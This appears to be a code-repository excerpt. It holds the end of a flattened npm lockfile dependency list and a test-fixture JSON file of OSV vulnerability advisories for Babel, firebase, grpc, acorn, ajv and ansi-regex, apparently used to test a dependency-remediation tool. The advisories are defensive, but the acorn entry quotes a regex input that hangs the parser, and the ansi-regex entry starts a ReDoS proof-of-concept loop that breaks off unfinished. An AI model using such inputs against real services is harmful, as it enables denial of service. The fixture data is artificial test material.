is-typed-array@^1.1.15 reflect.getprototypeof@^1.0.9 typed-array-length 1.0.7 call-bind@^1.0.7 for-each@^0.3.3 gopd@^1.0.1 is-typed-array@^1.1.13 possible-typed-array-names@^1.0.0 reflect.getprototypeof@^1.0.6 typedarray 0.0.6 uc.micro 2.1.0 uglify-js 3.6.0 commander@~2.20.0 source-map@~0.6.1 3.19.3 unbox-primitive 1.1.0 call-bound@^1.0.3 has-bigints@^1.0.2 has-symbols@^1.1.0 which-boxed-primitive@^1.1.1 underscore 1.8.3 1.13.7 undici 6.19.7 undici-types 7.16.0 unicode-canonical-property-names-ecmascript 1.0.4 2.0.1 unicode-match-property-ecmascript 1.0.4 unicode-canonical-property-names-ecmascript@^1.0.4 unicode-property-aliases-ecmascript@^1.0.4 2.0.0 unicode-canonical-property-names-ecmascript@^2.0.0 unicode-property-aliases-ecmascript@^2.0.0 unicode-match-property-value-ecmascript 1.1.0 2.2.1 unicode-property-aliases-ecmascript 1.0.5 2.2.0 unistore 3.4.1 3.5.2 update-browserslist-db 1.1.4 Scope peer|browserslist@>= 4.21.0 escalade@^3.2.0 picocolors@^1.1.1 upper-case 1.1.3 uri-js 4.4.1 punycode@^2.1.0 util 0.12.5 inherits@^2.0.3 is-arguments@^1.0.4 is-generator-function@^1.0.7 is-typed-array@^1.1.3 which-typed-array@^1.1.2 util-deprecate 1.0.2 uuid 3.3.2 3.4.0 8.3.2 9.0.1 verror 1.10.0 assert-plus@^1.0.0 core-util-is@1.0.2 extsprintf@^1.2.0 vinyl 2.2.0 clone@^2.1.1 clone-buffer@^1.0.0 clone-stats@^1.0.0 cloneable-readable@^1.0.0 remove-trailing-separator@^1.0.1 replace-ext@^1.0.0 2.2.1 clone@^2.1.1 clone-buffer@^1.0.0 clone-stats@^1.0.0 cloneable-readable@^1.0.0 remove-trailing-separator@^1.0.1 replace-ext@^1.0.0 vinyl-sourcemaps-apply 0.2.1 source-map@^0.5.1 w3c-hr-time 1.0.1 browser-process-hrtime@^0.1.2 1.0.2 browser-process-hrtime@^1.0.0 w3c-xmlserializer 1.1.2 domexception@^1.0.1 webidl-conversions@^4.0.2 xml-name-validator@^3.0.0 web-animations-js 2.3.1 2.3.2 web-vitals 4.2.4 webidl-conversions 3.0.1 4.0.2 websocket-driver 0.7.4 http-parser-js@>=0.5.1 safe-buffer@>=5.1.0 websocket-extensions@>=0.1.1 websocket-extensions 0.1.4 whatwg-encoding 1.0.5 
iconv-lite@0.4.24 whatwg-fetch 2.0.4 3.0.0 3.6.20 whatwg-mimetype 2.2.0 2.3.0 whatwg-url 5.0.0 tr46@~0.0.3 webidl-conversions@^3.0.0 7.0.0 lodash.sortby@^4.7.0 tr46@^1.0.1 webidl-conversions@^4.0.2 7.1.0 lodash.sortby@^4.7.0 tr46@^1.0.1 webidl-conversions@^4.0.2 which 1.3.1 isexe@^2.0.0 2.0.2 isexe@^2.0.0 which-boxed-primitive 1.1.1 is-bigint@^1.1.0 is-boolean-object@^1.2.1 is-number-object@^1.1.1 is-string@^1.1.1 is-symbol@^1.1.1 which-builtin-type 1.2.1 call-bound@^1.0.2 function.prototype.name@^1.1.6 has-tostringtag@^1.0.2 is-async-function@^2.0.0 is-date-object@^1.1.0 is-finalizationregistry@^1.1.0 is-generator-function@^1.0.10 is-regex@^1.2.1 is-weakref@^1.0.2 isarray@^2.0.5 which-boxed-primitive@^1.1.0 which-collection@^1.0.2 which-typed-array@^1.1.16 which-collection 1.0.2 is-map@^2.0.3 is-set@^2.0.3 is-weakmap@^2.0.2 is-weakset@^2.0.3 which-module 2.0.0 2.0.1 which-typed-array 1.1.19 available-typed-arrays@^1.0.7 call-bind@^1.0.8 call-bound@^1.0.4 for-each@^0.3.5 get-proto@^1.0.1 gopd@^1.2.0 has-tostringtag@^1.0.2 wide-align 1.1.3 string-width@^1.0.2 || 2 word-wrap 1.2.5 wordwrap 1.0.0 workerpool 6.1.0 6.2.0 6.5.1 wrap-ansi 2.1.0 string-width@^1.0.1 strip-ansi@^3.0.1 5.1.0 ansi-styles@^3.2.0 string-width@^3.0.0 strip-ansi@^5.0.0 7.0.0 ansi-styles@^4.0.0 string-width@^4.1.0 strip-ansi@^6.0.0 8.1.0 ansi-styles@^6.1.0 string-width@^5.0.1 strip-ansi@^7.0.1 wrappy 1.0.2 ws 6.2.1 async-limiter@~1.0.0 6.2.3 async-limiter@~1.0.0 7.1.2 async-limiter@^1.0.0 7.5.10 Scope peer|bufferutil@^4.0.1 Scope peer|utf-8-validate@^5.0.2 xml-name-validator 3.0.0 xmlchars 1.3.1 2.2.0 xmlcreate 2.0.4 xmlhttprequest 1.8.0 xregexp 4.0.0 y18n 4.0.0 4.0.3 5.0.8 yallist 2.1.2 3.1.1 4.0.0 yargs 12.0.2 cliui@^4.0.0 decamelize@^2.0.0 find-up@^3.0.0 get-caller-file@^1.0.1 os-locale@^3.0.0 require-directory@^2.1.1 require-main-filename@^1.0.1 set-blocking@^2.0.0 string-width@^2.0.0 which-module@^2.0.0 y18n@^3.2.1 || ^4.0.0 yargs-parser@^10.1.0 12.0.5 cliui@^4.0.0 decamelize@^1.2.0 
find-up@^3.0.0 get-caller-file@^1.0.1 os-locale@^3.0.0 require-directory@^2.1.1 require-main-filename@^1.0.1 set-blocking@^2.0.0 string-width@^2.0.0 which-module@^2.0.0 y18n@^3.2.1 || ^4.0.0 yargs-parser@^11.1.1 13.3.2 cliui@^5.0.0 find-up@^3.0.0 get-caller-file@^2.0.1 require-directory@^2.1.1 require-main-filename@^2.0.0 set-blocking@^2.0.0 string-width@^3.0.0 which-module@^2.0.0 y18n@^4.0.0 yargs-parser@^13.1.2 16.2.0 cliui@^7.0.2 escalade@^3.1.1 get-caller-file@^2.0.5 require-directory@^2.1.1 string-width@^4.2.0 y18n@^5.0.5 yargs-parser@^20.2.2 17.7.2 cliui@^8.0.1 escalade@^3.1.1 get-caller-file@^2.0.5 require-directory@^2.1.1 string-width@^4.2.3 y18n@^5.0.5 yargs-parser@^21.1.1 yargs-parser 10.1.0 camelcase@^4.1.0 11.1.1 camelcase@^5.0.0 decamelize@^1.2.0 13.1.2 camelcase@^5.0.0 decamelize@^1.2.0 20.2.4 20.2.9 21.1.1 yargs-unparser 1.6.0 flat@^4.1.0 lodash@^4.17.15 yargs@^13.3.0 2.0.0 camelcase@^6.0.0 decamelize@^4.0.0 flat@^5.0.2 is-plain-obj@^2.1.0 yauzl 2.10.0 buffer-crc32@~0.2.3 fd-slicer@~1.1.0 yocto-queue 0.1.0 ================================================ FILE: internal/remediation/testdata/santatracker/vulns.json ================================================ { "vulns": [ { "schema_version": "1.7.3", "id": "GHSA-968p-4wvh-cqc8", "published": "2025-03-11T20:30:18Z", "modified": "2025-04-16T15:39:50Z", "aliases": [ "CVE-2025-27789" ], "related": [ "CGA-3phx-qxx7-8vqw", "CGA-46ch-ch69-qmcw", "CGA-g6rv-q8mg-pp3f", "CGA-g7xj-r4gh-6jhr", "CGA-j8cm-jvwv-37vw", "CGA-m6wq-wmrx-cp34", "CGA-mwpg-44pj-qpj8", "CGA-qgr4-9ff9-9j58", "CGA-rh34-93h2-vxqh", "CGA-v5pv-jcc5-rq8m" ], "summary": "Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups", "details": "### Impact\n\nWhen using Babel to compile [regular expression named capturing groups](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Named_capturing_group), Babel will generate a polyfill for the `.replace` method 
that has quadratic complexity on some specific replacement pattern strings (i.e. the second argument passed to `.replace`).\n\nYour generated code is vulnerable if _all_ the following conditions are true:\n- You use Babel to compile [regular expression named capturing groups](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Named_capturing_group)\n- You use the `.replace` method on a regular expression that contains named capturing groups\n- **Your code uses untrusted strings as the second argument of `.replace`**\n\nIf you are using `@babel/preset-env` with the [`targets`](https://babeljs.io/docs/options#targets) option, the transform that injects the vulnerable code is automatically enabled if:\n- you use [_duplicated_ named capturing groups](https://github.com/tc39/proposal-duplicate-named-capturing-groups), and target any browser older than Chrome/Edge 126, Opera 112, Firefox 129, Safari 17.4, or Node.js 23\n- you use any [named capturing groups](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Named_capturing_group), and target any browser older than Chrome 64, Opera 71, Edge 79, Firefox 78, Safari 11.1, or Node.js 10\n\nYou can verify what transforms `@babel/preset-env` is using by enabling the [`debug` option](https://babeljs.io/docs/babel-preset-env#debug).\n\n\n### Patches\n\nThis problem has been fixed in `@babel/helpers` and `@babel/runtime` 7.26.10 and 8.0.0-alpha.17, please upgrade. It's likely that you do not directly depend on `@babel/helpers`, and instead you depend on `@babel/core` (which itself depends on `@babel/helpers`). 
Upgrading to `@babel/core` 7.26.10 is not required, but it guarantees that you are on a new enough `@babel/helpers` version.\n\nPlease note that just updating your Babel dependencies is not enough: you will also need to re-compile your code.\n\n### Workarounds\n\nIf you are passing user-provided strings as the second argument of `.replace` on regular expressions that contain named capturing groups, validate the input and make sure it does not contain the substring `$\u003c` if it's then not followed by `\u003e` (possibly with other characters in between).\n\n### References\n\nThis vulnerability was reported and fixed in https://github.com/babel/babel/pull/17173.", "affected": [ { "package": { "name": "@babel/helpers", "ecosystem": "npm", "purl": "pkg:npm/%40babel/helpers" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.26.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.26.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime-corejs2", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime-corejs2" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.26.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime-corejs3", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime-corejs3" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { 
"fixed": "7.26.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/helpers", "ecosystem": "npm", "purl": "pkg:npm/%40babel/helpers" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.17" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 8.0.0-alpha.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.17" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 8.0.0-alpha.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime-corejs2", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime-corejs2" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.17" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 8.0.0-alpha.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime-corejs3", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime-corejs3" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.17" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 8.0.0-alpha.16", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/babel/babel/security/advisories/GHSA-968p-4wvh-cqc8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27789" }, { "type": "WEB", "url": "https://github.com/babel/babel/pull/17173" }, { "type": "WEB", "url": "https://github.com/babel/babel/commit/d5952e80c0faa5ec20e35085531b6e572d31dad4" }, { "type": "PACKAGE", "url": "https://github.com/babel/babel" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2025-03-11T20:30:18Z", "nvd_published_at": "2025-03-11T20:15:18Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-67hx-6x53-jw92", "published": "2023-10-16T13:55:36Z", "modified": "2024-04-04T14:26:10Z", "aliases": [ "CVE-2023-45133" ], "related": [ "CVE-2023-45133" ], "summary": "Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code", "details": "### Impact\n\nUsing Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the `path.evaluate()`or `path.evaluateTruthy()` internal Babel methods.\n\nKnown affected plugins are:\n- `@babel/plugin-transform-runtime`\n- `@babel/preset-env` when using its [`useBuiltIns`](https://babeljs.io/docs/babel-preset-env#usebuiltins) option\n- Any \"polyfill provider\" plugin that depends on `@babel/helper-define-polyfill-provider`, such as `babel-plugin-polyfill-corejs3`, `babel-plugin-polyfill-corejs2`, `babel-plugin-polyfill-es-shims`, `babel-plugin-polyfill-regenerator`\n\nNo other plugins under the `@babel/` namespace are impacted, but third-party plugins might be.\n\n**Users that only compile trusted 
code are not impacted.**\n\n### Patches\n\nThe vulnerability has been fixed in `@babel/traverse@7.23.2`.\n\nBabel 6 does not receive security fixes anymore (see [Babel's security policy](https://github.com/babel/babel/security/policy)), hence there is no patch planned for `babel-traverse@6`.\n\n### Workarounds\n\n- Upgrade `@babel/traverse` to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. `@babel/core` \u003e=7.23.2 will automatically pull in a non-vulnerable version.\n- If you cannot upgrade `@babel/traverse` and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected `@babel/traverse` versions:\n - `@babel/plugin-transform-runtime` v7.23.2\n - `@babel/preset-env` v7.23.2\n - `@babel/helper-define-polyfill-provider` v0.4.3\n - `babel-plugin-polyfill-corejs2` v0.4.6\n - `babel-plugin-polyfill-corejs3` v0.8.5\n - `babel-plugin-polyfill-es-shims` v0.10.0\n - `babel-plugin-polyfill-regenerator` v0.5.3", "affected": [ { "package": { "name": "@babel/traverse", "ecosystem": "npm", "purl": "pkg:npm/%40babel/traverse" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.23.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-67hx-6x53-jw92/GHSA-67hx-6x53-jw92.json" } }, { "package": { "name": "@babel/traverse", "ecosystem": "npm", "purl": "pkg:npm/%40babel/traverse" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-67hx-6x53-jw92/GHSA-67hx-6x53-jw92.json" } }, { "package": { "name": "babel-traverse", "ecosystem": "npm", "purl": "pkg:npm/babel-traverse" }, "ranges": [ { "type": "SEMVER", "events": 
[ { "introduced": "0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 7.23.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-67hx-6x53-jw92/GHSA-67hx-6x53-jw92.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/babel/babel/security/advisories/GHSA-67hx-6x53-jw92" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45133" }, { "type": "WEB", "url": "https://github.com/babel/babel/pull/16033" }, { "type": "WEB", "url": "https://github.com/babel/babel/commit/b13376b346946e3f62fc0848c1d2a23223314c82" }, { "type": "WEB", "url": "https://babeljs.io/blog/2023/10/16/cve-2023-45133" }, { "type": "PACKAGE", "url": "https://github.com/babel/babel" }, { "type": "WEB", "url": "https://github.com/babel/babel/releases/tag/v7.23.2" }, { "type": "WEB", "url": "https://github.com/babel/babel/releases/tag/v8.0.0-alpha.4" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00026.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5528" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-697" ], "github_reviewed": true, "github_reviewed_at": "2023-10-16T13:55:36Z", "nvd_published_at": "2023-10-12T17:15:09Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fpm5-vv97-jfwg", "published": "2021-05-18T01:57:24Z", "modified": "2025-01-14T08:56:55.449807Z", "aliases": [ "CVE-2020-7765" ], "summary": "Uncontrolled Resource Consumption in firebase", "details": "This affects the package @firebase/util before 0.3.4. This vulnerability relates to the deepExtend function within the DeepCopy.ts file. 
Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.", "affected": [ { "package": { "name": "@firebase/util", "ecosystem": "npm", "purl": "pkg:npm/%40firebase/util" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-fpm5-vv97-jfwg/GHSA-fpm5-vv97-jfwg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7765" }, { "type": "WEB", "url": "https://github.com/firebase/firebase-js-sdk/pull/4001" }, { "type": "WEB", "url": "https://github.com/firebase/firebase-js-sdk/commit/9cf727fcc3d049551b16ae0698ac33dc2fe45ada" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-FIREBASEUTIL-1038324" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-04-15T21:39:07Z", "nvd_published_at": "2020-11-16T12:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7v5v-9h63-cj86", "published": "2024-06-10T21:38:05Z", "modified": "2024-07-15T22:12:28.175716Z", "aliases": [ "CVE-2024-37168" ], "related": [ "CGA-3vxq-pj3w-xvh2", "CGA-w377-c6cx-3vgh", "CVE-2024-37168" ], "summary": "@grpc/grpc-js can allocate memory for incoming messages well above configured limits", "details": "### Impact\nThere are two separate code paths in which memory can be allocated per message in excess of the `grpc.max_receive_message_length` channel option:\n\n 1. If an incoming message has a size on the wire greater than the configured limit, the entire message is buffered before it is discarded.\n 2. 
If an incoming message has a size within the limit on the wire but decompresses to a size greater than the limit, the entire message is decompressed into memory, and on the server is not discarded.\n\n### Patches\n\nThis has been patched in versions 1.10.9, 1.9.15, and 1.8.22\n", "affected": [ { "package": { "name": "@grpc/grpc-js", "ecosystem": "npm", "purl": "pkg:npm/%40grpc/grpc-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.10.0" }, { "fixed": "1.10.9" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-7v5v-9h63-cj86/GHSA-7v5v-9h63-cj86.json" } }, { "package": { "name": "@grpc/grpc-js", "ecosystem": "npm", "purl": "pkg:npm/%40grpc/grpc-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.9.0" }, { "fixed": "1.9.15" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-7v5v-9h63-cj86/GHSA-7v5v-9h63-cj86.json" } }, { "package": { "name": "@grpc/grpc-js", "ecosystem": "npm", "purl": "pkg:npm/%40grpc/grpc-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.8.22" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-7v5v-9h63-cj86/GHSA-7v5v-9h63-cj86.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/grpc/grpc-node/security/advisories/GHSA-7v5v-9h63-cj86" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37168" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/commit/08b0422dae56467ecae1007e899efe66a8c4a650" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/commit/674f4e351a619fd4532f84ae6dff96b8ee4e1ed3" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/commit/a8a020339c7eab1347a343a512ad17a4aea4bfdb" }, { "type": "PACKAGE", "url": 
"https://github.com/grpc/grpc-node" } ], "database_specific": { "cwe_ids": [ "CWE-789" ], "github_reviewed": true, "github_reviewed_at": "2024-06-10T21:38:05Z", "nvd_published_at": "2024-06-10T22:15:12Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pp75-xfpw-37g9", "published": "2021-05-10T19:16:14Z", "modified": "2025-01-14T08:57:34.513174Z", "aliases": [ "CVE-2020-7768" ], "summary": "Prototype pollution in grpc and @grpc/grpc-js", "details": "\"The package grpc before 1.24.4 and the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition.\"", "affected": [ { "package": { "name": "grpc", "ecosystem": "npm", "purl": "pkg:npm/grpc" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.24.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-pp75-xfpw-37g9/GHSA-pp75-xfpw-37g9.json" } }, { "package": { "name": "@grpc/grpc-js", "ecosystem": "npm", "purl": "pkg:npm/%40grpc/grpc-js" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.8" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-pp75-xfpw-37g9/GHSA-pp75-xfpw-37g9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7768" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/pull/1605" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/pull/1606" }, { "type": "WEB", "url": "https://github.com/grpc/grpc-node/releases/tag/grpc%401.24.4" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038819" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-GRPC-598671" }, { "type": "WEB", "url": 
"https://snyk.io/vuln/SNYK-JS-GRPCGRPCJS-1038818" }, { "type": "WEB", "url": "https://www.npmjs.com/package/@grpc/grpc-js" }, { "type": "WEB", "url": "https://www.npmjs.com/package/grpc" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2021-04-19T22:57:05Z", "nvd_published_at": "2020-11-11T11:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6chw-6frg-f759", "published": "2020-04-03T21:48:38Z", "modified": "2021-08-23T15:10:32Z", "summary": "Regular Expression Denial of Service in Acorn", "details": "Affected versions of acorn are vulnerable to Regular Expression Denial of Service.\nA regex in the form of /[x-\\ud800]/u causes the parser to enter an infinite loop.\nThe string is not valid UTF16 which usually results in it being sanitized before reaching the parser.\nIf an application processes untrusted input and passes it directly to acorn,\nattackers may leverage the vulnerability leading to Denial of Service.", "affected": [ { "package": { "name": "acorn", "ecosystem": "npm", "purl": "pkg:npm/acorn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "5.5.0" }, { "fixed": "5.7.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-6chw-6frg-f759/GHSA-6chw-6frg-f759.json" } }, { "package": { "name": "acorn", "ecosystem": "npm", "purl": "pkg:npm/acorn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.4.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-6chw-6frg-f759/GHSA-6chw-6frg-f759.json" } }, { "package": { "name": "acorn", "ecosystem": "npm", "purl": "pkg:npm/acorn" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.1.1" 
} ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/04/GHSA-6chw-6frg-f759/GHSA-6chw-6frg-f759.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/acornjs/acorn/issues/929" }, { "type": "WEB", "url": "https://github.com/acornjs/acorn/commit/793c0e569ed1158672e3a40aeed1d8518832b802" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-ACORN-559469" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1488" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-04-03T21:42:14Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v88g-cgmw-v5xw", "published": "2022-02-10T23:30:59Z", "modified": "2024-06-21T21:33:48Z", "aliases": [ "CVE-2020-15366" ], "summary": "Prototype Pollution in Ajv", "details": "An issue was discovered in ajv.validate() in Ajv (aka Another JSON Schema Validator) 6.12.2. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. 
(While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.)", "affected": [ { "package": { "name": "ajv", "ecosystem": "npm", "purl": "pkg:npm/ajv" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "6.12.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-v88g-cgmw-v5xw/GHSA-v88g-cgmw-v5xw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366" }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/commit/65b2f7d76b190ac63a0d4e9154c712d7aa37049f" }, { "type": "PACKAGE", "url": "https://github.com/ajv-validator/ajv" }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.12.3" }, { "type": "WEB", "url": "https://github.com/ajv-validator/ajv/tags" }, { "type": "WEB", "url": "https://hackerone.com/bugs?subject=user\u0026report_id=894259" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0007" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2021-05-10T21:23:41Z", "nvd_published_at": "2020-07-15T20:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-93q8-gq69-wqmw", "published": "2021-09-20T20:20:09Z", "modified": "2023-11-08T04:06:25.310142Z", "aliases": [ "CVE-2021-3807" ], "related": [ "CGA-pgv4-jr4j-qh5w" ], "summary": "Inefficient Regular Expression Complexity in chalk/ansi-regex", "details": "ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.\n\n**Proof of Concept**\n```js\nimport ansiRegex from 'ansi-regex';\nfor(var i = 1; i \u003c= 50000; i++) {\n var time = 
